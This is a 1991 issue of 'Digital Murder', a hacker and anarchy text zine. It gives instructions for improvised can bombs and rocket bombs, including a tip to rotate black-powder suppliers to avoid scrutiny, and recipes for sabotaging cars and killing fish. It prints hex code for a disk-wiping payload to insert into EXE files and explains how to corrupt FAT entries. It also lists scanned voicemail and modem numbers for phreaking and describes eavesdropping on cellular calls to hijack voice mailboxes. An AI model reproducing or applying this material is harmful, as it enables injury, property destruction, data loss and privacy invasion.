2








      ///  / ///  / /////  //  /       //    // // // ///   ///  ////  ///
     /  / / /__  /   /   /  / /       ///  /// // // /  /  /  / /     /  /
    /  / / /  / /   /   //// /       // // // // // ///   /  / /''   ///
   ///  / //// /   /   /  / /////   //    // ///// //  \ ///  ///// //  \



             A Magazine for Cyberpunks and Other Hi-Tech Low-Lifes


              Issue No. 02                        November '91

















         -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

           These filez are for educational and informational studies
           only.  The writers for Digital Murder will not be responsible
           for any use or misuse of information published in this
           disk-based magazine.  The magazine and its contents are
           free to the public and may be freely distributed in any
           form as long as Digital Murder magazine and the author
           is given credit.

         -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


                             Information is Power.























                          E d i t o r ' s   N o t e z
                         -=-=-=-=-=-=-=-=-=-=-=-=-=-=-

        Here it is!  Issue #2 of Digital Murder released, slightly
        late,  November 25th, 1991.  It'z been hell getting everyone
        motivated enough to continue a monthly 'zine but, as you can
        see, it was done.

        We got a lot of positive responses from readers and have heard
        that issue #1 hit 35 or so boards in the United Socialist Republic
        of America and a few boards overseas (Sweden, Switzerland, and
        Holland).  Thanks goes out to those few that I asked to spread
        the magazine and an even larger group that spread it without me
        asking. . . you know who you are.

        Since the idea of using a P.O. Box flopped due to no one sending
        us mail to it, we have closed it.  If you were thinking about
        sending us a letter, sorry.  We have plans on getting an internet
        address as soon as I decide where to get it.  As well as the
        internet address, we plan to start a usenet newsgroup.  We will
        put a complete list of addresses to reach us at in issue #3 which
        will be out December 15th.  So until issue #3 comes out, call
        The Backdoor at 901.386.6455 to leave comments, submit articles,
        pick up the current or previous issue, etc.

                                         - M o r p h e u s / Editor.
        ---------------------------------------------------------------
         D i g i t a l   M u r d e r  -  -  -  Backdoor (901)/386.6455
        --------A---D-a-n-g-e-r---K-u-l-t---P-r-o-d-u-c-t-i-o-n--------


        pg#.               I N   T H I S   I S S U E
        ----              ---------------------------
          3       Anachy For Sale---Neuron God & Mystic Blade's
                  guide to destruction.

          6       Virus in My Soup!---Digital Terrorist brings
                  you more virus phun.

          8       Virtual Networks---General/Technical file on a
                  few fone networks.

�@����5+���$QY�Month---Zapped brings another great
                  scan for your enjoyment.

         12       Cellular Freqing---Eavesdropping on Cellular
                  calls with modified scanners.

         14       Action Systems Fone Network Info by Technysis

         16       Heaven's Trash---Final words from Morpheus.

        -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-










                                                                         3


                   - = A N A R C H Y   F O R   S A L E = -
                    By: Neuron God/INFOword/Danger Kult



   Sticky Coolwhip
   ---------------

   This first project involves three substances; Vinegar, Milk
   (whole), and Cool Whip.

   Heat the milk in a pot until it comes to a VERY  low  boil.
   Add vinegar until it  separates.  The  solids  are  CASEIN.
   Heard of it before??  heheh.. yeah, that's  the  shit  they
   used to use for superglue.  Now, all you have to do is make
   a good amount of this and  mix it  with  Cool Whip.  You'll
   have a fluffy white mixture which puffs up very nicely  and
   is sticky as hell.

   Possible uses:
                  Cake topping.  Fucks up dentures
                  (and regular teeth)

                  Cover for keyhole on car.. (guess)

                  Car design solvent.  Munches the paint
                  right off.

   Try freezing it.  If you've whipped it up enough, it should
   be fairly liquified and will run easily.  Freezing it  will
   give you a substance similar to a Jell-O pudding shit.  Try
   adding food coloring and putting it on a stick.. will taste
   like milk that's slightly older than God.



   Phun With Coke Cans
   -------------------

   Hell, you could use any kind of can for these as long as ya
   drain it, wash it, and let it dry WELL.

   For this first project, you'll need to cut the  bottom  off
   of one of the cans.  Really old  scissors  that  are  still
   fairly sharp (and which won't be missed by, say, the  local
   store) are good for cutting cans since  they  cut  straight
   and quickly.  Cut the bottom off with about 1 inch of  thin
   metal left to make a cup-looking thing.  Take the  scissors
   and at about 1 quarter inch margins (one centimeter for the
   Euros, I know it's not equivalent, but it doesn't  matter),
   cut down the sides about  another  quarter inch.  Bend  the
   flaps down to keep from getting cut  while  you  work  with
   this thing.  If you have soldering experience,  solder  the
   flaps to the inside of the can just to make sure (this also
   makes it easier to use in other projects).








                                                                         4


   You can make a lot of these now if you  want  because  they
   will be the most-used part of the cans.  Don't  throw  away
   the top part yet because the sheetmetal-type  aluminum  can
   be used to make some AWESOME 'noisemakers'!!

   Now that you have a few of these prepared, obtain some black
   gunpowder.  This is sold at some weapons  shops  (especially
   those which specialize in Black-Powder  or  antique-interest
   weapons, or which carry  shell  packing  materials  for  the
   rabid hunter who likes to repack shells). You should be able
   to get this without any permits but if you buy it in excess,
   questions will be asked.  To  be  safe, either  buy  packing
   materials (which can also be useful if you're  the  creative
   type) or buy from different stores around the area, rotating
   your supplier every week.

   We can now begin on our first 'device'.  In  model  rocketry
   hobby section of your local hobby store there are  specially
   made engines and ignitors for these  engines.  They  can  be
   used for our purposes seperately or together, so get  a  few
   of them.  The ignitors are electricity-based flamers and You
   will need some source of electricity (about 2-3 AA batteries
   should do the trick) and some  LONG  wires  to  connect  the
   flamer to the source.  Some Scotch tape (or any clear, light
   weight tape) is needed to hold  the  flamers  in  place.  In
   this project, you need to cut out some  of  the  scrap-metal
   from the long  upper  part  of  the  cans.  One  can  should
   provide at least enough for two of these devices.  Cut  just
   enough of the sheet metal out to totally encircle a  medium-
   powered rocket  engine  (I  like  the  A8-3  single  stagers
   myself).  The engine should be large  enough  to  carry  the
   weight of the metal.  When you have the  metal  cut  to  the
   proper size, move the engine FAR away and solder  the  metal
   into a cone.  Cut a small circle of metal just big enough to
   cover one end of the cylinder and solder it  in  place.  Let
   this cool OVERNIGHT just to be safe.  The engine should  now
   slide into and out of the  container  easily.  Depending  on
   what type of thing you want to  make, follow  the  remaining
   instructions:

   1: Bomb-- To make a bomb out of this, cut another  circle  out
             of the metal as though you were going  to  plug  the
             second end up as well.  Cut one side of this  circle
             just enough so that the igniter and wires can  still
             fit correctly to the engine.  Plug the  empty  space
             with something which is light but flammable, such as
             toilet paper or paper towels but not too  tight.  If
             you're too nervous to solder the  second  cover  on,
             use something like superglue or epoxy.

   2: Rocket/bomb--  The same as above, except that you can  pack
             some explosive substance at the closed  end  of  the
             container, then some toilet tissue or  Kleenex  (not
             very much on this one though), then the engine.  The
             engine must be superglued in just at the  bottom  of
             the tube where the rocket end is exposed so lift can
             be achieved.






                                                                         5


             It is  advised  that  you  put  controlling
             surfaces on your rocket so it will be a little  more
             predictable.  Use light tape on  the  flamer  so  it
             will easily release when the  rocket  lifts  off.  I
             strongly recomend using some sort of launch guidance
             system, such as a part of a drinking straw glued  to
             the outside of the rocket and then set onto a  metal
             dowell that will keep it flying straight until  it's
             at a safe height.

             When the rocket reaches its top flight, it will send
             out a small explosion  at  the top which will ignite
             whatever you pack up there.

             The rocket works best with  custom-designed  rockets
             from your hobby store, with some slight modifications,
             such as an addition of the  explosive instead of a
             parachute or streamer.

             The rockets may take a few  seconds/minutes
             to ignite, since some  flamers  aren't  as  good  as
             others.  If you make a heavy rocket, use as  big  an
             engine as it needs (you'll learn by experiment).

   Cans can also be used to make great alcohol lamps, ovens, or
   bombs.  Get a flamer from the previous projects, some  dena-
   tured alcohol (6xx proof!!! don't drink it!!) and  some  can
   bottoms.  Drill a hole in one can bottom big enough to  work
   with, but not so big as to be unpluggable.  Solder this  one
   to an unmodified can bottom to make  a  container  with  two
   bottoms.  The hole should be in the center of the bottom  of
   one of the  cans.  Pour  the  alchohol  into  the  container
   slowly through the drilled hole until it is about 3/4  full.
   Put a flamer in the hole so that it just barely touches  the
   alcohol.  Tape this sucker  up  good  and  superglue  it  if
   possible.  The flamer should ignite the  alcohol  which  has
   just enough air to burn  good,  and  the  cans  will  either
   implode or explode depending on whether the  alcohol  cathes
   fire good or not.  It may just use up some of the oxygen and
   create a partial  vaccum,  or  it  may  explode  and  spread
   burning alcohol quite a distance.

   A full can of a carbonated drink can be fun, too.  Shake  it
   up, roll it around, throw it up in the air (if you throw  it
   really high, catch it.  If not, let it hit the ground).  Try
   putting it over a LOW flame on a grill.  When it  starts  to
   bulge, remove it.  After doing any/all of these things, take
   it to a tall building with a stairway.  If it is  like  most
   stairways, there will be some space in the center where this
   can be dropped.  With the combination of the pressure inside
   the can and the force of it  falling,  the  impact  will  be
   quite messy (and if not found for a few days, sticky, smelly
   and hazardous to the new paint job too...   heheh..)  It  is
   hell to clean up.. just try to get the can to add that extra
   touch to the question "What the Hell happened here?"    They
   won't even know where to begin asking questions...







                                                                         6


   All of these ideas can be expanded upon, modified,  or  just
   plain used in unusual ways.  Remember,  always  be  creative
   with your methods of destruction...  NG '91 -- InFOWOrd/ DK.


   Awful Magic Powder - by: Mystic Blade!
   ------------------

   Needed
   ------
           * 6 or 7 cans of Arid Extra Dry spray.
           * 1 closet size mirror
             * Note * You can scale this done to just a bathroom
             mirror or any flat smooth surface.

   Spray the surface of the mirror until completey solid white.

   Let it set and dry for the next 24 hrs. then scrape of the
   residue.  Do this until all the Arid is gone.  You now have what's
   known as Great awful magic powder.


   One ounce of this powder per automobile gas tank will screw up an
   engine.

   A single teaspoon will kill off a 10 gallon fish tank and all the fish.

   Till fun is fun....Im outta here!  *Mystic Blade*



                             /\/\/\/\/\/\/\/\/\/\
                              An Algebra of Evil
                             \/\/\/\/\/\/\/\/\/\/
                             More Virus Info from
                              Digital Terrorist!

   More Hard Drive Phun!
   -=-=-=-=-=-=-=-=-=-=-

        Hey,  you  anarchists  trying  to learn something, This is for
   you!  I just thought you might find it interesting...

   Do you know that you can destroy a hard disk by writing 18 bytes
   to the end of an EXE file (you can do it with 14 but I'll just do
   this for the sake of simplicity).

   Ok, to use this look for the last occurence of CD 21 (or m! in ascii)
   with some type of hex/ascii editing program.  Once you have found it,
   insert these hex codes after that last CD 21.  Be careful...  Don't
   run this program after you have "fixed" it unless you want to re-
   format your HD.  Here goes...











                                                                         7


   (insert these bytes of hex code in after the final m! [CD 21].
   Notice that the m is ascii 205 not an equal sign (=).)

   B4 03
   B0 C8
   B5 00
   B1 01
   B6 00
   B2 02    (the 02 stands for the C drive.  You can specify 00 for
             A drive, or 01 for B drive, etc...   This is the drive
             that you want to destroy.)
   CD 13
   B4 4C
   CD 21

   Well, that's pretty much it.  Viruses are made in a way such as
   that the virus takes code such as this and manually inserts  it
   into an EXE or COM file along with the code  that  it  has  for
   self replication.  Also, notice that this code is made to write
   over the boot, FAT, and root directory sectors  with  just  any
   ole' address out of memory...  ( whatever is in the DS  and  DX
   registers at the time ).  Note that you can  also  insert  your
   code BEFORE the last CD 21 by inserting it two bytes before the
   last CD 21 (those two bytes in fact should be B4 4C).  Once you
   do that, you can cut this code down to 14 bytes by  eliminating
   the final four bytes (B4 4C CD 21).

   File Phun
   -=-=-=-=-

   Scanning files in directories, and changing the entry of the
   "starting cluster" and the file size.  By  changing, I  mean
   swapping with other files so, therefore, if you once had  an
   EXE file called READTHG.EXE and some other files, you  would
   mysteriously find that READTHG.EXE contained another EXE,  a
   data file, or a text file.

   How do you do it?  No problemo...  First you ascertain  info
   from the boot sector on where the  FAT  and  root  directory
   sector are located which will be explained later.  Then  you
   pick out the root directory sector.  Filename entries  in  a
   directory sector are stored as such:

     [ Filename- 11 bytes no period!] [Attribute- 1 byte]
       XX XX XX XX XX XX XX XX XX XX XX XX

       [Reserved by MS-DOS- 10 bytes] [Time/Date stamp- 4 bytes]
       XX XX XX XX XX XX XX XX XX XX  [Time]  [Date]
                                      XX XX   XX XX

       [Starting Cluster- 2 bytes]  [File Size- 4 bytes]
       XX XX                        XX XX XX XX

       Notice that the XX's are hexadecimal numbers.









                                                                         8


       1.  Filename is padded with spaces between the first eight and
           the last 2. ie HELLO  DOC... It MUST be padded with spaces
           if it is to be used.

       2.  Attribute:
                     Read Only-    hex 01
                        Hidden-    hex 02
                       Archive-    hex 20
                  Subdirectory-    hex 10
                  Volume Label-    hex 08
                        System-    hex 04

       When these attributes are combined (say read only and hidden),
       they produce hex 03, or the sum of their numbers.

       3. Time/Date stamp will almost ALWAYS be irrelevant to a good
          anarchist.

       4. Starting Cluster- this is the cluster where the file  starts.
          DOS reads the FAT chain and determines where ALL of that file
          is but if this and file size are swapped  with  other  files,
          pandemonium will break lose.

       5. File Size- this is represented by a 4 byte binary number, the
          rightmost digit being most signifigant.

       Well, that should pretty much give you plenty of information  to
       do that nice little thing, or plenty of other things.




                          Virtual Telephone Networks
                           General/Technical Outline
                       Written and compiled by Morpheus.
                      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


        This technical journal on Telephone Networks has been
   compiled to introduce the basics of them to  newer  phreakers
   yet does contain a lot of information that will interest  the
   more advanced reader.


   History of Virtual Networks
   =-=-=-=-=-=-=-=-=-=-=-=-=-=

   To be honest, virtual networks are nothing new since many LDS
   companies, such as AT&T, MCI, and Sprint, have been  offering
   them since 1985.

   ISACOMM (now US Sprint) was the first to introduce a  virtual
   network  service,  using  Satellite  Business  Systems  (SBS)
   satellites as early as '84.  SBS acted as the  carrier  while
   ISACOMM  was  responsible  for  promoting  and  managing  the
   service.







                                                                         9


   SBS introduced it's own network in early '85  and  was  later
   bought by MCI.

   Also in 1985, US Telecom redifined ISACOMM  as  VPN  (Virtual
   Private Network) which is now the base for Sprint.  Later on,
   AT&T introduced its Software Defined Network (SDN) product.


   AT&T's  SDN
   =-=-=-=-=-=

   When a user picks up his phone at an  on-net,  dedicated  SDN
   site and dials a number, the dialed digits are  sent  to  the
   serving AT&T SDN office through the local network.  This  SDN
   office receives the dialed digits, and notes the  originating
   number via ANI (Automatic Number Identification).  This  info
   is passed to the ACP (Action Control Point), which will  then
   check the NCP network database for  routing  and  translation
   information based on the ANI of the user.  After the check is
   complete, the NCP returns appropriate routing information  to
   the ACP, which encodes a billing record  and  send  the  call
   through the network.

   AT&T  has  marketed  many  special  features  with  SDN.  For
   example, when the NCP receives the call information from  the
   originater of the call, it can screen the call  according  to
   a set of valid originating numbers to see if the call is even
   allowed to be sent through the network.  It can also be setup
   to request an authorization code to validate  calling  privs.
   It can prompt certain screened calls with preprogrammed  ann-
   ouncements to provide options for routing.

   Off-net calls follow a similar procedure in which the user of
   the SDN dials an off-net access number (800- or 950-) or  can
   access the network through switched  equal  access.  In  this
   case, the dialed digits and any code entered are screened and
   sent to the ACP, and then gets instructions from the NCP.

   Whenever announcements are required, they are sent  from  the
   Network Services Complex (NSC).  Thus, if the network were to
   ask for an authorization code, the message would be sent from
   the NSC.

   Map of SDN:
   ----------                     Features
              SDNCC               --------
          SMS     --\--              !!
          -\-        \    +----------!!--------------+
            \         >-->!-->-->->+-!!--+        A L!
             \            !        ! NCP !        T D!
              >-->-->-->-->-->-->->! --- !   NSC  & N!
                          !        /-----\   /    T  !
                          !       /       \ /        !
                          !     ACP       ACP        !
                          +-----/----------\---------+
                               /            \
                          SDN Dialup     SDN Dialup






                                                                        10


   MCI's  VNET
   =-=-=-=-=-=

   This network uses three types of switches:  1) Northern Tele-
   com DMS-250, 2) DEX 400, and 3) DEX 600 by Digital Switch Co.
   MCI uses SS7 (signal system 7) on all of  their  intermachine
   trunks.

   When a user picks up the phone and calls the  dialup,  it  is
   connected into the MCI Vnet network similarly to SDN by AT&T.
   The routing of a Vnet call  starts  with  a  request  from  a
   digital switch to the Network Control System (NCS) for  route
   information.  This request travels through one  of  the  Data
   Access Points and then the NCS checks the customer's database
   for routing information, call privileges, etc. and sends that
   information back to the switch, again through the DAP.  After
   all this, the call is sent through.

   Map of Vnet:
   -----------
   Dial '1' or Vnet Card Access            Calling thru Dialup
   ------------!!!-------------            --------!!!--------
               !!!                                 !!!
    (Telco C.O. switches call)    (Telco CO doesn't switch call)
               !!!                                 !!!
        +--------------------+           +--------------------+
     /<-- MCI Network Access !-----------! MCI Network Access -->\
     !  +--------------------+           +--------------------+  !
     !         !!!                                 !!!           !
     !         !!!                                 !!!           !
     \      MCI Switch                          MCI Switch      /
      \                   +----------------+                   /
       >-->-->-->-( DAP )-!     N.C.S.     !-( DAP )-<--<--<--<
                          +----------------+


   US Sprint's VPN
   =-=-=-=-=-=-=-=

   US Sprint uses 100% fiber optic networking and uses powerful
   Northern Telecom DMS-250 switches linked by SS7, with DMS300
   switches as international gateways.

   When a US Sprint VPN user picks up the phone, dials a  local
   VPN system, and calls through it, the call is  forwarded  to
   a serving point.  That switch, through its Message  Switch &
   Buffer (MSB) signaling point, sends a routing request to the
   nearest Signal Transfer Point (STP).  The STP passes the re-
   quest to the Database Control Point  (DCP)  for  processing.
   After checking the customer's database account, the info  is
   sent back to the MSB.  The call is then sent through.












                                                                        11


                    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                     Digital Murder Scan 'o' de Month!
                    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Zapped here with another scan for all of you phone
   junkies out there.  This scan, as you will see below, is of
   the 233 prefix.  If you missed last month's article, it was
   on the 336 prefix.  Get in touch with us. . . we have all
   back issues on file.

   Prefix owned by:  AT&T

   Voice Mail Systems
   ------------------
   1-800-233-0010  After Business Hrs VMB
   1-800-233-0065  Methodist Hospital--listen or hit 0.
   1-800-233-0214  Knoll Sue's VMB--listen for menu.
   1-800-233-0316  * + 4 digit boxes.
   1-800-233-0407  First Trust---
   1-800-233-0567  Corum 'Hell'--* or #.
   1-800-233-0618  experiment with--uses 'numeric messages'
   1-800-233-0713  Datanational-- *
   1-800-233-0995  Griffen Services-- #  3 digit boxes
   1-800-233-1000  Audix VMB
   1-800-233-1106  * -- 3 digit boxes
   1-800-233-1304  Aetna - */#  4dig.boxes
   1-800-233-1717  4dig.boxes
   1-800-233-1808  3dig.boxes
   1-800-233-1903  Beacon's NW--*/# (fairly easy)
   1-800-233-2025  (currently using an old VMB sys.)
   1-800-233-2119  Spectrum */#  3digboxes(excld.1,2)
   1-800-233-2250  Credit and Leasing Corp.
   1-800-233-2331  Billing Dept of DTOM
   1-800-233-2400  Am. Murex Corp.
   1-800-233-2450  Armstrong---Dictation Service...interesting
   1-800-233-2520  Interesting System...
   1-800-233-2617  uses Audix--listen or hit *7
   1-800-233-2875  */# 3digs.boxes
   1-800-233-3029  Penox Tech.--*/#
   1-800-233-3200  0+1 for VMB
   1-800-233-3314  ?
   1-800-233-3411  0+1 for VMB
   1-800-233-4007  ?
   1-800-233-4606  Bank of San Fran--haven't messed w/it
   1-800-233-4800  #+* ...3dig boxes
   1-800-233-5969  *+ext/# for VMB
   1-800-233-6269  */#
   1-800-233-6300  *+x (x=dig 0-9)
   1-800-233-6789  */#
   1-800-233-9069  alwayz busy...couldn't verify
   1-800-233-9175  same as 9069
   1-800-233-9325  same as 9069
   1-800-233-9477  listen for menu
   1-800-233-9575  same as 9069
   1-800-233-9650  same as 9069








                                                                        12


   Carriers
   --------
   1-800-233-0037 (expected hello,:job,:data,or(cmd),as logon.(cierr 1402)
   1-800-233-0692 (<<please enter logon>>)
   1-800-233-0887
   1-800-233-1217 (wierd pulse then carrier and kicks off line)
   1-800-233-2921 (???)
   1-800-233-4224 (performance 200 emulex)
   1-800-233-4700 (towers perrin online -- phila  --press enter)
   1-800-233-5315 (gives > prompt)

   PBXs/etc
   --------
   1-800-233-1925
   1-800-233-3750


   Fax's & Misc.
   -------------
   1-800-233-0180
   1-800-233-0904
   1-800-233-1210
   1-800-233-2180
   1-800-233-2850
   1-800-233-3504
   1-800-233-4479
   1-800-233-5169
   1-800-233-5170
   1-800-233-6150


   Thats it for this month so be watching next time for more
   and hopefully more interesting numbers to play around with
   so until then Ive been. . . .  Zapped!



        -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
                     Scanning for Phun and Information.
                                By: Chizz
        -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Scanners are wonderful toys.  They allow us to listen to info
   that otherwise would be impossible to hear.  Everyone has heard
   of using scanners to listen in on police and fire, but that gets
   old after a while.  One can only hear so much of police calling
   in stating that they are going on a doughnut break.  Now there is
   a use for a scanner that is much more interesting, not to mention
   fun: listening in on cordless phones and cellular phones.
   One day, blackened buffered a post off of a board that listed the
   10 cellular frequencies.  There are 10 for the base and 10 for
   the handset.  The base frequencies are the most powerful, there-
   fore these are the ones that should be put into the scanner.  I
   did not except much while i reluctantly inputed the frequencies
   but after I fired up and started scanning, I could not believe
   my ears.







                                                                        13


   Picking up my neighbors is really quite interesting.  I have
   heard everything from a woman's daughter being pregnant to a
   couple owing 10,000 dollars in back taxes, and their unhappiness.
   It is so easy to pick up these cordless phones that it is funny.

   Cordless phones can be picked up by any programmable scanner such
   as the $139.00 Radio-Shack pro-38, 10 channel programmable.
   Below is a list of the cordless phone frequencies:

          Channel                  Base                      Handset
             1                    46.610                     49.670
             2                    46.630                     49.845
             3                    46.670                     49.860
             4                    46.710                     49.770
             5                    46.730                     49.875
             6                    46.770                     49.830
             7                    46.830                     49.890
             8                    46.870                     49.930
             9                    46.930                     49.990
            10                    46.970                     46.970

   Now onto the more interesting and lively world of cellular
   phones.  You must have a scanner that is 800 megahertz capable.
   My personal choice is a realistic pro-34.  This is a hand-held
   model that has 200 channels, built in backlit lcd, and 10
   channel temporary storage, for an effective capacity of 210
   channels.  This scanner runs for about $300 bux but I bought
   mine at a pawn      shop for $120.  The true cellular band is from
   869.0000 mhz to 894.000 mhz.  For some reason the powers that
   be convinetly omit the cellular band, instead, stopping at
   868.9375 and resuming at 896.1125 on the pro-34.  If you are
   happy listening to "mobile" phones, more appropriately known
   as two way radios, that operate in the 800 mhz band then a
   "stock" scanner is fine but if you are like me, that's just
   not enough.

   I was looking through a copy of radio-electronics one day and
   noticed that there was a scanner BBS.  I called this bbs and
   downloaded a text file that contained the steps to modify a
   pro-34 for true cellular capabilities.  There is not room here
   to go into how to modify the scanner but call the Red Onion BBS
   at (914) 342-4585 to get the file for this scanner or any other
   scanner (they have files for all popular scanners).  After making
   the modifications, you can start the search scan at 869.0000
   to 894.0000.

   If you live a large city, the cellular band is active at all times.
   I have listened to calls with subjects such as drug deals,
   prostitution, people growing their own dope, and a lady talking
   about using dildos.  One particully funny moment was when this one
   guy got into a fight with his girlfriend, went out and got drunk,
   and on his way home he called up his girlfriend crying and moaning
   and then he got pulled over for drunk driving.  It is also a










                                                                        14


   good way to get information if you have a DTMF decoder.  A lot of
   people that have cellular phones also have VMB's.  You can listen
   in as they call their system and if you are familiar with the
   system that they are on, you can call up and take over their box.

   If you think that this would be an interesting thing to do then
   be sure to do it soon because in the next ten years or so all
   cellular services will be switched from analog to digital making
   it impossible for a conventional scanner to be able to decode the
   conversations.  If you have any questions, or information that
   you have found useful then please leave me mail on Digital murder's
   WHQ, The Backdoor BBS at (901)/386-6455.



                         --------------------------------
                        Disection of the ACTION Roadrunner
                           Telephone Management system
                         --------------------------------
                                  By:Technysis

         This  series  of  artices  to  follow  has  taken  much time
         and extensive coverage.   I  see  these  articles  as  truly
         original material, as I went through personal connections to
         get the information contained here.

        The following information was taken  from  various  technical
        sources and other misc. information from a rural area here in
        my state. I live in Memphis, which  is  under  ESS,  however,
        where I was at, they were under some other older system.

        The  Action  Roadrunner  Telephone  Management  System  is  a
        computer controlled routing,  tandem  switching  system.   As
        such, the system functions in support of an existing PBX type
        system and may be configured for network  operations  between
        properly equipped locations.  Through these  of  the  network
        capabilities,  a  business can impliment a private network to
        reduce overall call costs and record  network/system  traffic
        statistics.  Network operations are provided by extending the
        local serial bus of the Master node to control the  operation
        of  satellite  nodes and collect call record data from Remote
        intelligent nodes.  Unintelligent (noncomputerized) satellite
        nodes  are  controlled exclusively by the intelligent node to
        which they are connected by data link  and  tie  lines.   The
        Intelligent  Remote  nodes  direct  their own call processing
        functions and those of their associated Satellite nodes.   In
        this  configuration,  the Master node serves as a centralized
        record  collection   point   while  providing  a  centralized
        database update point.

        The  support  equipment  expalined  serves  to   expand   the
        interfacing  capabilities  of  the  system  by  accommodating
        ground  start-type  trunk  circuits  and  collected  key-type
        systems.  Other equipment, when optionally  selected  by  the
        CO,  is  designed  to provide remote access from rotary tele-
        phone by the Voice Terminal Device.







                                                                        15


        VCA Subsystem
        -------------

        A Pulsecom Voice Connecting Arrangement  (VCA)  subsystem  is
        used  instead  of Telco-supplied CDH-type VCAs.  Each circuit
        card interfaces one system port to one  Telco  trunk  circuit
        (DDD,  WATS, or FX).  These cards are housed in 10 card cages
        which  are  assembled  into  a  wall  mounted  rack  assembly
        containing  eight  card  cages  for  a  total of 72 VCAs on a
        freestanding rack assembly containing 16  card  cages  for  a
        total of 144 VCAs.

        Amplifier Subsystem
        -------------------

        Trunk  amplification  is  used  to adjust and stabilize trunk
        levels appearing at the  system  while  being  OFF  when  the
        circuit  is  not  in  use.   The single-channel circuit cards
        (repeaters) housed in 11-slot card cages are assembled into a
        wall  mounted  rack assembly which can contain up to six card
        cages for a total of  66  amplifiers  per  rack.   Each  rack
        requires  a  dedicated  120  Vac  15 amp circuit to power the
        -48 Vdc power supply which supplies the required power to the
        card cages.  Two amplifier circuit card types  are  available
        for  voice only or voice/data circuits.  A voice-only circuit
        uses the UM-100 Amplifier Card and a voice/data circuit  uses
        a  VFR-1050  Amplifier  card.  Both card types share the same
        card cage.  One 25-pair cable is used per  card  cage.   Each
        circuit  consists  of two-cable pairs for a total of 22 pairs
        within each cable.  The first cable pair is connected to each
        of  the  Telco  side of the demark and the second pair to the
        ACTION side.

        The UM-100 Amplifier Card is equipped with a UM-3502  Plug-on
        Option  card  which  is  used to program the amplifiers oper-
        ation.  Two adjustment options are also  available  with  the
        3502  card.   The  VFR-1050  Amplifier  card is supplied with
        progammable options as well.  This card  is  used  when  data
        transmissions are anticipated on the connected trunk circuit.

        The  VFR-1050   Amplifier   Card  options  given  consist  of
        amplifier   gain    adjustment,    equilization   adjustment,
        sensitivity slope adjustment, and a  disable  on/off  switch.

        Keyset Adapter Subsystem
        ------------------------

         The Keyset Adapter subsystem is employed to permit telephone
         circuits that are not associated with a PBX type  system  to
         be  interfaced  to  the  system.  Key systems  or  dedicated
         single-line  instruments  may  access  the  system  by  this
         subsystem.  The Keyset Adapter Subsystem may  be  configured
         in  a  free  standing  rack (128 circuits max.) or on a wall
         mounted unit (48 circuits max.)  The two circuit cards  that









                                                                        16


         make  up  the  Keyset  Adapter  Circuit  are the E&M-to-Loop
         Converter Card and the Dual Line Coil Card.  The  Dual  Line
         Coil Card accommodates two E&M-to-Loop cards.  The cards are
         clustered in groups of three with the Dual Line Coil Card in
         the center to provide two circuits.  Three clusters of three
         cards each supply six circuits per card  cage  in  the  wall
         mount  unit  and  four  clusters yielding eight circuits per
         card cage in the free standing rack.

        Voice Terminal Device
        ---------------------

        The Voice Terminal Device (VTD) is a  word  recognition  sub-
        system configured into a single cabinet.  The VTD is composed
        of a cental processor, a vector processor, memories, and  I/O
        devices  for  eight  system ports.  The System port cards are
        configured for 2-wire operation with 0db pads  and  serve  as
        the bidirectional VTD interface.

        The  System  port  cards  used  for  the  VTD  are located in
        consecutive card cage slots within a single card  cage.   The
        first  card is a Voice Terminal Serial Interface Card and the
        next seven  cards  are  Audio  Interface  Cards.   The  Voice
        Terminal  Serial  Interface card accepts the binary output of
        the VTD for the  eight  serial  ports.  Theu|Y| decoded output of
        each of the right ports is sent to the Voice Terminal  Serial
        Interface card in the first port.
        ----------------------------------

        Hope  that  was  at least a little bit interesting.  That was
        nowhere near the complexity of explainng ESS.   However,  the
        little  trip to the past could prove useful because many sys-
        tems such as these are still in  use.   I  will  have  future
        articles on the Action  system  but  for  now  I  can't  type
        anymore...  Hehehe..

        Later  all and don't forget; Bell holds the ultimate in info-
        rmation and power from us but they will not be able  to  hold
        back  the flood of hackers breaking away at their wall.  Long
        live the cause.

                      -/-\-/-\-/-\-/-\-/-\-/-\-/-\-
                       H e a v e n ' s   T r a s h
                      -\-/-\-/-\-/-\-/-\-/-\-/-\-/-

   Strip away the blanket of secrecy!  Here's a few books I've
   found that I encourage you to order and READ.

   The Brotherhood by Stephen Knight--
   Take a look behind-the-scenes at the inner workings
   of the Masons, a tightly knit, all male society whose
   members hold some of the highest posts in business and
   government. . .and who are bound by an iron-clad oath
   of secrecy.  --$8.95










                                                                        17

   Big Secrets by WIlliam Poundstone--
   this book blows the lid off some of the world's best
   kept secrets.  You'll learn how to beat a lie-detector
   test, get the low down on secret messages and subliminal
   advertising, and how U.S. currency is made.  --$8.95

   Make My Day by George Hayduke--
   Don't get mad, get even!  Make My Day covers every type
   of revenge from simple pranks to complex plots.  You'll
   learn hundreds of devious, diabolical ideas for getting
   even.  --$7.95

   Those books can by ordered by calling 1-800-282-8086.


   ------------------------------------
   The Anarchist Cookbook-----$21.95
   The Poor Man's James Bond--$21.95
   Shipping/Handling-----------$4.00
   (602)/634-6280
   Those can be purchased at named prices from:
   BUTOKUKAI
   P.O. Box 430 Dept. SG
   Cornville, AZ  86325
   ------------------------------------

   You can get the Anarchist Cookbook a little cheaper by ordering
   it from the publishers ($22.00 postpaid).
   Barricade Books
   Box 1401-F
   Secaucus, NJ  07096
   -----------------------------------

   If you are into punk, alternative, ''new-wave'', or whatever
   you wanna call it or are interested in reading some good
   'zines with topics ranging from political corruption, anti-
   government action, and environmental news then check these
   phucking cool mags.  Write 'em for price info if not listed.

   Flipside  (punk rock/noise/industrial/etc..music)
   P.O. Box 363
   Whittier, CA  90608

   Little Free Press  (government views/utopian societys/etc)
   Rt. 1  Box 102
   Cushing, MN  56443

   Maximum Rock & Roll (punk/hardcore/etc..music)
   P.O. Box 288
   Berkeley, CA  94701

   File 13  ($2.00 per issue last time i checked)
   P.O. Box 175
   Concord, MA  01742
   ----------------------------------------------------------
   ----------------------------------------------------------








